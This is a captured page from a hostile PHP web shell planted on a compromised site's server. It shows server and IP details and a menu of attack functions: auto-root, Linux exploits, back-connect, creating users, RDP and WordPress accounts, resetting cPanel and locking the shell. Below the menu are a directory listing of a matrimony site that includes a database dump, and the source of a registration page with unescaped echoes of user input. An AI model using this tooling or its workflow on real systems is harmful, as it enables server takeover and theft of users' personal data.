Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
matrimony1 /
[ HOME SHELL ]
Name
Size
Permission
Action
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.htaccess
214
B
-rw-r--r--
Thumbs.db
2.5
KB
-rw-r--r--
afterlogin.html
11.12
KB
-rw-r--r--
blank.gif
49
B
-rw-r--r--
home.css
5.92
KB
-rw-r--r--
iepngfix.htc
5.1
KB
-rw-r--r--
iepngfix_tilebg.js
4.07
KB
-rw-r--r--
index.html
11.2
KB
-rw-r--r--
index1.php
16.87
KB
-rw-r--r--
matrimonial.sql
298.54
KB
-rw-r--r--
matrimony-registrationstep3.ph...
21.91
KB
-rw-r--r--
matrimony-registrationstep4.ph...
22.33
KB
-rw-r--r--
matrimony-registrationstep5.ph...
14.36
KB
-rw-r--r--
register5.php
75.82
KB
-rw-r--r--
subpage.css
192
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : matrimony-registrationstep3.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Welcome to My Matrimoni</title> <link href="home.css" rel="stylesheet" type="text/css" /> <script src="iepngfix_tilebg.js" type="text/javascript"></script> <link rel="stylesheet" type="text/css" media="screen" href="css/milk.css" /> <script type="text/javascript" src="js/jquery-1.8.0.min.js"></script> <script type="text/javascript" src="js/jquery.validate.min.js"></script> <script id="demo" type="text/javascript"> //===function for date DAY====== $(document).ready(function() { // validate signup form on keyup and submit var validator = $("#signupform").validate({ groups: { expires: "day month year" }, rules: { txtname: { required: true, minlength: 3, //number: false, }, txtgotra: { required: true, minlength: 3, }, year: { required: true, }, cmbcomplexion:{ required: true, }, cmbheight: { required: true, }, cmbbodytype: { required: true, }, cmbmothertongue: { required: true, }, cmbannInc: { required: true, }, txtimage: { required: true, accept: "jpg|jpeg|png|ico|bmp" } }, messages: { year: { required: " Select Birth Date" }, txtname: { required: " Enter Full Name ", minlength: " Minimum 3 Characters" //number: "enter number" }, txtgotra: { required: " Enter Gotra ", minlength: " Minimum 3 Characters" }, cmbcomplexion:{ required: " Select complexion", }, cmbheight: { required: " Select Height", }, cmbbodytype: { required: " Select Body Type", }, cmbmothertongue: { required: " Select Language", }, cmbannInc: { required: " Select Annual Income", }, txtimage: { required: " Select Profile Image", } }, // the errorPlacement has to take the table layout into account errorPlacement: function(error, element) { error.prependTo( element.parent().next() ); }, success: function(label) { // set as text for IE label.html(" ").addClass("checked"); } }); }); </script> </head> <?php include('../include/aryasamaj-clientinclude.php'); ?> <body> <div class="metrimonial_main bgimage"><img src="images/my_metrimonial.png" alt="My Metrimonial" /> <div class="mainlinks"> <ul> <li><a href="#">Home</a></li> <li><a href="#">About Us</a></li> <li><a href="#">Contact Us</a></li> <li><a href="#">Articles</a></li> <li><a href="#">events</a></li> </ul> <div class="clr"></div> </div> </div> <div class="metrimonial_main"> <div class="marquee"> <marquee> 15/01/11 - Marquee news will goes here Marquee news will goes here 10/01/11 - Marquee news will goes here Marquee news will goes here Marquee </marquee> </div> <div class="mainbg"> <div class="mainleft"> <div class="login"> <div class="loginbot"><h1>Login</h1> <input name="textfield2" type="text" class="inputtxtl" id="textfield2" value="User Name" /> <input name="textfield3" type="text" class="inputtxtl" id="textfield3" value="Password" /> <div class="fp"><a href="#">Forgot Password ?</a></div> <div><input name="input2" type="button" value=" " class="submitbtn" /></div> <div class="clr"></div> </div> </div> <div class="lbtn"> <a href="#"><img src="images/register_free.jpg" alt="Register Free" /></a> <a href="#"><img src="images/view_grooms.jpg" alt="View Grooms" /></a> <a href="#"><img src="images/view_brides.jpg" alt="View Brides" /></a> <a href="#"><img src="images/success_stories.jpg" alt="Success Stories" /></a> </div> <div class="invite"> <form id="form4" name="form4" method="post" action=""> <label> <input name="textfield" type="text" class="inputtxt" id="textfield" value="Enter Email" /> </label> <input name="input" type="button" value=" " class="invitebtn" /> </form> </div> <div class="ad">Advertisement</div> <div class="adimg"><img src="images/gwwindia.jpg" alt=" " /> <img src="images/ad.jpg" alt=" " /></div> </div> <div class="maincont"> <div class="mnc welcome"> <h1>Welcome to My Matrimonial</h1> <!--put form --> <hmtl> <form sname="signupform" id="signupform" autocomplete="off" method="POST" enctype="multipart/form-data" class="styleThese mnc5"> <div align="center"> <font color="red"><?php echo SuccessMessage($msg1);?></font></div> <div class="clr"></div> <h1>Personal Details</h1> <!--form start--> <div class="reg_info_wide width500"> <div class="label"><?php echo $lbl_profilecreate;?> : </div> <div class="ld errmsg"> <select name="cmbprocreate" id="cmbprocreate" <?php echo $classcntr; ?>> <?php echo getProcreate();?> </select> </div> <div class="ld status"></div> <div class="clr"></div> </div> <div class="reg_info_wide"> <div class="label"><?php echo $sign." ".$lbl_gender; ?> : </div> <input type="radio" name="rdgender" id="rdgender" value="Male" checked="true" class="skipThese" /> Male <input type="radio" name="rdgender" id="rdgender" value="Female" class="skipThese" /> Female </div> <div class="clr"></div> <div class="reg_info_wide"> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_fullname; ?> : </div> <div class="ld"> <input type="text" name="txtname" id="txtname" onkeypress="return isAlphabetic(event);" value="" <?php echo $classfnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_gotra; ?> : </div> <div class="ld errmsg"><input type="text" name="txtgotra" id="txtgotra" value="" onkeypress="return isAlphabetic(event);" <?php echo $classLnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"> <div class="label"><?php echo $sign." ".$lbl_birthdate; ?> : </div> <?php echo '<div class="ld errmsg"><select id="day" style="width:60px; margin:0 3px 0 0; padding-top:3px;" name="day" '.$classday.'>'.GetDay($_SESSION["day"]).'</select>'; echo '<select id="month" style="width:75px; margin:0 3px 0 0; padding-top:3px;" name="month" '.$classmonth.' >'.GetMonth($_SESSION["month"]).'</select>'; echo '<select id="year" style="width:80px; padding-top:3px;" name="year" '.$classyear.'>'.GetMagazineYear($_SESSION["year"]).'</select></div>'; ?> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"> <div class="label"><?php echo $lbl_birthtime; ?> : </div> <?php echo '<div class="ld errmsg"><select id="day" style="width:60px; margin:0 3px 0 0; padding-top:3px;" name="day" '.$classday.'>'.GetMinute().'</select>'; echo '<select id="month" style="width:75px; margin:0 3px 0 0; padding-top:3px;" name="month" '.$classmonth.' >'.GetSecond().'</select>'; ?> <select id="" style="width:80px; padding-top:3px;" name="" <?php echo $classyear; ?>> <option id="" name="" value="0">AM</option> <option id="" name="" value="1" >PM</option> </select> </div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_birthplace ; ?> : </div> <div class="ld errmsg"> <input type="text" name="txtbithplace" id="txtbithplace" onkeypress="return isAlphabetic(event);" value="<?php if($_SESSION["txtname"]!=""){ echo $_SESSION["txtname"]; }else{ echo $_POST["txtname"]; } ?>" <?php echo $classfnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_complexion;?> : </div> <div class="ld errmsg"> <select name="cmbcomplexion" id="cmbcomplexion" <?php echo $classcntr; ?>> <option value=""><?php echo "Select complexion";?></option> <?php echo getComplexion();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_height;?> : </div> <div class="ld errmsg"> <select name="cmbheight" id="cmbheight" <?php echo $classcntr; ?>> <option value=""><?php echo "Select Height";?></option> <?php echo getHeight();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_bodytype;?> : </div> <div class="ld errmsg"> <select name="cmbbodytype" id="cmbbodytype" <?php echo $classcntr; ?>> <option value=""><?php echo "Select Body Type";?></option> <?php echo getBodytype();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="label"><?php echo $sign." ".$MaritalStatus; ?> : </div> <input type="radio" name="rdmarrstatus" id="rdmarrstatus" value="Never Married" checked="true" class="skipThese" /> Never Married <input type="radio" name="rdmarrstatus" id="rdmarrstatus" value="Annulled" class="skipThese" /> Annulled <input type="radio" name="rdmarrstatus" id="rdmarrstatus" value="Divorced" class="skipThese" /> Divorced <input type="radio" name="rdmarrstatus" id="rdmarrstatus" value="Widowed" class="skipThese" /> Widowed </div> <div class="clr"></div> <div class="reg_info_wide"> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_specialcase;?> : </div> <div class="ld errmsg"> <select name="cmbspecialcase" id="cmbspecialcase" <?php echo $classcntr; ?>> <?php echo getspecialcase();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_mothertongue;?> : </div> <div class="ld errmsg"> <select name="cmbmothertongue" id="cmbmothertongue" <?php echo $classcntr; ?>> <option value=""><?php echo "Select Language";?></option> <?php echo GetLanguage(2);?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="clr"></div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_profileimage; ?> : </div> <div class="ld errmsg"> <input type="file" name="txtimage" id="txtimage" size="20" class="skipThese" maxlength="100" class="txtbox" /> </div><div class="ld status"></div><div class="clr"></div> </div> <h1>Qualification Details</h1><br /> <div class="width500"><div class="label"><?php echo $lbl_fieldofstudy; ?> : </div> <div class="ld errmsg"> <input type="text" name="txtfieldofstudy" id="txtfieldofstudy" onkeypress="return isAlphabetic(event);" value="<?php if($_SESSION["txtfieldofstudy"]!=""){ echo $_SESSION["txtfieldofstudy"]; }else{ echo $_POST["txtfieldofstudy"]; } ?>" <?php echo $classfnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_institutions; ?> : </div> <div class="ld errmsg"> <input type="text" name="txtfieldofstudy" id="txtfieldofstudy" onkeypress="return isAlphabetic(event);" value="<?php if($_SESSION["txtfieldofstudy"]!=""){ echo $_SESSION["txtfieldofstudy"]; }else{ echo $_POST["txtfieldofstudy"]; } ?>" <?php echo $classfnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_passoutin;?> : </div> <div class="ld errmsg"> <select name="cmbpassin " id="cmbpassin" <?php echo $classcntr; ?>> <?php echo GetCurrYear();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <h1>Occupation Details</h1><br /> <div class="width500"><div class="label"><?php echo $lbl_whtudo;;?> : </div> <div class="ld errmsg"> <select name="cmbwtyoudo" id="cmbwtyoudo" <?php echo $classcntr; ?>> <?php echo getWhtudo();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_field;?> : </div> <div class="ld errmsg"> <select name="cmbspecialcase" id="cmbspecialcase" <?php echo $classcntr; ?>> <?php echo getspecialcase();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_desigination; ?> : </div> <div class="ld errmsg"> <input type="text" name="txtdesigination" id="txtdesigination" onkeypress="return isAlphabetic(event);" value="<?php if($_SESSION["txtfieldofstudy"]!=""){ echo $_SESSION["txtfieldofstudy"]; }else{ echo $_POST["txtfieldofstudy"]; } ?>" <?php echo $classfnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_addofoccup; ?> : </div> <div class="ld errmsg"> <input type="text" name="txtaddofoccu" id="txtaddofoccu" onkeypress="return isAlphabetic(event);" value="<?php if($_SESSION["txtfieldofstudy"]!=""){ echo $_SESSION["txtfieldofstudy"]; }else{ echo $_POST["txtfieldofstudy"]; } ?>" <?php echo $classfnm; ?>/></div> <div class="ld status"></div><div class="clr"></div> </div></div> <div class="reg_info_wide"> <div class="width500"><div class="label"><?php echo $lbl_bodytype;?> : </div> <div class="ld errmsg"> <select name="cmbbodytype" id="cmbbodytype" <?php echo $classcntr; ?>> <?php echo getBodytype();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $sign." ".$lbl_annincome;?> : </div> <div class="ld errmsg"> <select name="cmbannInc" id="cmbannInc" <?php echo $classcntr; ?>> <option value=""><?php echo "Select Annual Income";?></option> <?php echo GetAnnIncome();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <h1>Social Details</h1><br /> <div class="width500"><div class="label"><?php echo $lbl_house;?> : </div> <div class="ld errmsg"> <select name="cmbhouse" id="cmbmhouse" <?php echo $classcntr; ?>> <?php echo GetHouse();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> <div class="width500"><div class="label"><?php echo $lbl_currlocation;?> : </div> <div class="ld errmsg"> <select name="cmbcurrlocation" id="cmbcurrlocation" <?php echo $classcntr; ?>> <?php echo GetCurrtLocation();?> </select> </div><div class="ld status"></div><div class="clr"></div> </div> </div> <br /> <div class="instruction"> <input type="submit" name="btnsubmit" id="btnsubmit" value="<?php echo $btn_submit; ?>" class="submit_form skipThese" /> </div> <div class="clr"></div> </form> </hmtl> <!----> </div> </div> <div class="clr"></div> </div> <div class="clr"></div> </div> <div class="curveline"></div> <div class="footer"> <div class="metrimonial_main flinks"><a href="#" title="Home">Home</a> | <a href="#" title="About Us">About Us</a> | <a href="#" title="Photo Gallery">Articles</a> | <a href="#" title="Contact Us">Events</a> | <a href="#">Contact Us</a><br /> <div class="copyright">My Metrimonial© 2011 All rights reserved <a href="#">Terms & condition</a> | <a href="#">Privacy Policy</a></div> <div class="developer"><a href="http://www.gwwindia.com" target="_blank"><img src="images/site_created_by_gwwindia.png" width="117" height="15" alt="gwwindia" title="GWWINDIA - Your key to internet success We create quality at reasonable price web sites, web portals, web applications, community websites web designing and web programming www.gwwindia.com Rajkot, Gujarat, India"/></a></div> <div class="clr"></div> </div></div> <div class="curveline"></div> </body> </html>
Close